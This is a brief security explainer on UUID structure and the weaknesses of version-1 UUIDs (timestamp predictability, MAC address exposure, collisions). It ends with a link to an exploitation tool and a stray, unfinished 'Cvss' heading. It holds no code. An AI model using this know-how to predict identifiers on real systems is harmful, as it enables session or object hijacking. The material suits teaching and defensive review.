What is a UUID?

A UUID is a 128-bit number used to uniquely identify objects or information in a distributed system. It is also known as a GUID (Globally Unique Identifier) in some contexts. The UUID standard is widely used in software development for various purposes such as database keys, session identifiers, and component identifiers.

Structure of a UUID

A UUID consists of 32 hexadecimal digits, displayed in five groups separated by hyphens, in the form of 8-4-4-4-12. For example:

123e4567-e89b-12d3-a456-426614174000

Version can be determine by the third set of characters (12d3 --> version 1, 42d3 --> version 4)

Vulnerabilities of UUID1

  1. Predictability:

    • The timestamp component of a UUID1 makes it possible to predict the UUIDs generated within a close time frame. If an attacker knows or can guess the approximate time a UUID was generated, they can potentially predict other UUIDs generated around that same time.

  2. MAC Address Exposure:

    • UUID1 includes the MAC address of the machine that generated it, which can expose the hardware address of the machine. This information can be used for targeted attacks, network mapping, or tracking the machine across different networks.

  3. Potential for Collisions:

    • While UUID1 is designed to be unique, if multiple UUIDs are generated on machines with the same MAC address at the same exact time, there is a potential (albeit low) for collision. This is more likely in systems where the system clock is not precisely synchronized or in virtualized environments where multiple virtual machines might share the same MAC address.

Exploitation tool

https://github.com/Lupin-Holmes/sandwich (opens in a new tab)

Cvss